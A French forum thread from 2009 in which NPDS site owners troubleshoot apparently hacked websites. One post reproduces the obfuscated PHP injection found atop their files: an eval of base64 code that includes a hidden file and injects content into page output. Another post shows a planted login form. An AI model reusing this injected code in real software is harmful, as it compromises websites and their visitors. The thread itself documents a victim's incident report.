NPDS : Gestion de contenu et de communauté

je viens de t'envoyer un email

comme ca je trouve pas avec le filemanager, est ce que tu peux m'envoyer un zip stp par je regarderai ca demain

ok, je te mets quoi dans le zip?

à part ça, mais peut être rien à voir, j'ai vu que sous IE dans l'Edito il y a ça d'affiché
"END title --> BEGIN caption --> "
mais quand je vais voir dans le code HTML de l'edito je ne voit pas cette ligne???
et sous Firefox ça ne s'affiche pas?

et sinon, je viens de changer de mot de passe de la base de données mysql

tu me met tous les fichiers qui se trouve sur ton espace web sauf les flv

euh, plutôt tous ceux qui sont dans le NPDS?
parce qu'il n'est pas à la racine du site,

ok, je vais faire ça et je te le mets en téléchargement

OUPs!! :-?
Je pense subir le même désagrément. A savoir, Lorsque je veux 'proposer un article', j'ai une bonne page de texte avec des liens qui s'affiche avant le mon bandeau habituel. En editant le code de la page submit.php, je trouve bien le script, bien sur inconnu.
Autre chose: changement de theme: après avoir choisi le nouveau, je tombe sur le formulaire d'authenfication 'fantôme' évoqué. Voici le code de la page submit.php:


<form action='/user.php' method='POST'><input type='text' name='login'><br/><input name='pass' type='password'><br /><input type='submit' value='authenticate'></form>


J'ai désactive la fonction filemanager, j'espere que ça va s'arreter là!
Les seules modif majeurs sont le passage à évolution le 28/01/09 et l'installation de npdsAnalytics le 17/02/09.
Je suis disponible pour fournir tous renseignements pouvant aider à décuvrir le pb.

et bien je pense ue tu as comme moi été victime d'un piratage :-(

Ouaih...
J'ai rechargé les 2 fichiers, mais malheureusement, le pb demeure. as tu avancé dans tes recherches?

non j'ai abandonné et suis en train de refaire le tout de A à Z

je me demande si je ne vais pas etre oblige de passer par là, car je ne sais plus quoi faire! Mais la question qui subsiste: comment se premunir de ce truc? :-?
Bon courage

tu es hébergé chez qui?

Je suis chez free.
J'ai vu l'échange avec Hotfirenet, as tu des retours d'analyse de tes fichiers?
J'hésite encore à tout réinstaller :-?
Je viens de remarquer que la plupart de mes fichiers (sur le serveur) possede sur la premiere ligne, donc avant le code NPDS ce code:


<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvbW50LzE0NS9zZGEvOC8wL2FuYWJuYW5jeS9lZGl0ZXVyL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9kb2NzL2VuL2ltYWdlcy9jb3BwZXIucGhwJykpe2luY2x1ZGVfb25jZSgnL21udC8xNDUvc2RhLzgvMC9hbmFibmFuY3kvZWRpdGV1ci90aW55X21jZS90aGVtZXMvYWR2YW5jZWQvZG9jcy9lbi9pbWFnZXMvY29wcGVyLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>




Message édité par : mimit54 / 20-02-2009 09:17

ouep j'ai vu ca aussi et je me disais que ca venais du cache et en plus base_64_decode n'existe pas dans le code Npds

j'y comprend rien a votre probleme

J'ai rapatrié tous les fichiers de la racine du site, aucune trace du formulaire 'authenticate'
Comment apres avoir 'Valider mes modifications' (changer de theme), je me retrouve avec l'appel de user.php avec juste comme contenu le code copié plus haut.
J'ai fait une erreur tout à l'heure c'est le contenu de user.php et non pas submit.php :-(
J'aime pas ne pas comprendre :paf mais où chercher :-? :-?

ba c ça le problème, je ne sais plus ou chercher ...
ce qui m'a parut bizarre pour bege, c'est que j'ai récupérer son site et installer sur mon serveur et la je n'avez plus d'erreur plus de script !javascript! plus de problème ...

donc est ce que ton site utilise d'autre script que NPDS ?

Oui, en effet j'ai encapsulé Coppermine. Tu penses que je dois le virer pour voir?
bege avait d'autres scripts que NPDS?

Je peux préciser que je n'ai rien vu d'anormal dans les fichiers security.log, par contre dans les sessions, j'ai très fréquemment 5,6 voire 9 sessions d'anonymes provenant d'adresse de sites étrangers sans aucun rapport avec le sujet traité sur mon site.
Voici d'ailleurs l'adresse: http://anabnancy.free.fr/

Message édité par : mimit54 / 21-02-2009 14:33

aaaaaaaaaaaargh! nan, fallait pas me montrer ça!!!
j'aime trop les Bonsaï!
mais j'ai aussi trop de passions, ça va plus ça, c'est de la provoc! je me plaindrais :-D


P.S.
rien à voir mais plus moyen de mettre un avatar dans mon profil :-(

Ah oui, c'est une de mes nombreuses occupations, patience, nature, soins, bien être à tailler, regarder pousser mais bref on est pas là pour ça, cet après midi, j'ai commencé un rempotage, ça m'a detendu de l'informatique :=!
Mais j'y suis de nouveau et voici le résultat!!
J'ai copié tout mon site, BdD comprise en local, sous EasyPHP et pas une erreur, pas de formulaire bizarre, mais où se cache le diable :-?
Là, je vais me coucher, car ça me dépasse! J'espère que je ne vais pas faire de cauchemar ;-)

pourtant tu es en sable evol toi contrairement a bege ...

Le canard est toujours vivant!!
J'ai transféré tout le contenu du site sur un autre hébergement, pas de pb. Je sais que bege nous a fait part de tout refaire, alors je voulais savoir si l'opération a été concluante avant de m'y lancer.